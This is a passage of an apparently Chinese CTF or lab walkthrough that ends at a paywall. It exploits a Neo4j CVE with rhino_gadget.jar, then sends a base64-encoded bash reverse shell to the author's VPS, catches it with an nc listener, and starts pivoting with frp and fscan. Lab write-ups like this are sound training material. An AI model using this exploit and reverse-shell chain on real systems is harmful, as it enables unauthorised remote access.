重置了很多次靶机,所以靶机ip变化请忽略
flag01
fscan扫一下
7474、7687端口可以看出是neo4j(CVE),直接执行命令(base64编码中的ip和端口改成自己vps的ip和相应的端口)
java -jar rhino_gadget.jar rmi://39.99.151.101:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC9wb3J0IDA+JjE=}|{base64,-d}|{bash,-i}"
vps上监听端口
nc -lvvp 5001 #之间在base64中开放了5001端口get shell
找到flag01
find / -name flag*
flag02
ifconfig查看一下,内网网段172.22.6.0/24
将frp和fscan传入tmp目录下(不是tmp的话没有权限)
【A机有文件要通过wget上传到B机,则需要在A机开启http服务】
python3 -m http.server 80</
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
